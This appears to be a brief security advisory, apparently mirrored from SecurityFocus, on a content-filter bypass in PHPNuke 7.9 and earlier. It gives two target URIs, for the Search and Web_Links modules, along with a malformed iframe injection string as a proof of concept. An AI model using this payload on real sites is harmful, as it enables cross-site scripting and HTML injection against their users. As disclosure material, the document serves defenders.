15 lines
No EOL
565 B
Text
15 lines
No EOL
565 B
Text
source: http://www.securityfocus.com/bid/15855/info
|
|
|
|
PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.
|
|
|
|
PHPNuke 7.9 and prior versions are reported to be vulnerable.
|
|
|
|
URI:
|
|
http://www.example.com/[DIR]/modules.php?name=Search
|
|
Insert:
|
|
<iframe src=http://www.example.com?phpnuke79 <
|
|
|
|
URI:
|
|
http://www.example.com/[DIR]//modules.php?name=Web_Links
|
|
Insert:
|
|
<iframe src=http://www.example.com?phpnuke79 < |